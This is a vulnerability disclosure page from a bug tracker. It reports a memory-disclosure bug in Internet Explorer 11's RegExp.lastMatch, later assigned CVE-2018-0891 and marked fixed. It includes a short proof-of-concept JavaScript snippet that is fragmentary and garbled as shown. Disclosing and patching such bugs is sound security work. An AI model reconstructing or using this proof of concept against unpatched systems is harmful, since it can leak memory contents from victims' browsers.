New issue
Advanced search Search tips

Issue 1461 link

Starred by 2 users

Issue metadata

Status: Fixed
Closed: Mar 2018

Sign in to add a comment

IE11: RegExp.lastMatch memory disclosure

Project Member Reported by, Dec 6 2017

Issue description

There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.

This was tested on IE11 running on Window 7 64-bit with the latest patches applied.



<!-- saved from url=(0014)about:internet -->

function main() {
  RegExp.input = {toString: f};

var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");

function f() {, "bbbbbbbbbb");




Note that sometimes the PoC results in a crash (I made no attempt to make it reliable) while sometimes it results in pieces of memory being displayed (see the attached screenshot).

This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

Project Member

Comment 1 by, Dec 6 2017

31.3 KB View Download
Project Member

Comment 2 by, Feb 20 2018

Labels: CVE-2018-0891
Project Member

Comment 3 by, Mar 1 2018

Labels: Deadline-Grace
Project Member

Comment 4 by, Mar 20 2018

Labels: -Restrict-View-Commit
Status: Fixed (was: New)
Fixed in

Sign in to add a comment